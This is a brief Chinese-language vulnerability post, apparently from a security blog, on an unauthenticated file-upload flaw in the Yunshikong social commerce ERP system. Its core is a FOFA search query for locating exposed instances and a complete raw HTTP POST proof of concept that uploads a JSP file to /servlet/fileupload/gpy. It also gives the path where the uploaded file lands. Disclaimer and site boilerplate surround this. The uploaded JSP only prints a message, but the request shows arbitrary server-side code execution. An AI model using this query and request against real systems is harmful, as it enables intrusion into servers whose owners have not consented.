免责声明
漏洞描述
资产确定
fofa: app="云时空社会化商业ERP系统"漏洞复现
1.利用如下POC进行文件上传
POST /servlet/fileupload/gpy HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=4eea98d02AEa93f60ea08dE3C18A1388Content-Length: 238--4eea98d02AEa93f60ea08dE3C18A1388Content-Disposition: form-data; name="file1"; filename="check.jsp"Content-Type: application/octet-stream<% out.println("This website has a vulnerability"); %>--4eea98d02AEa93f60ea08dE3C18A1388--
2.文件上传成功后路径为:/uploads/pics/上传日期/check.jsp
如有侵权,请联系删除
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……




还没有评论,来说两句吧...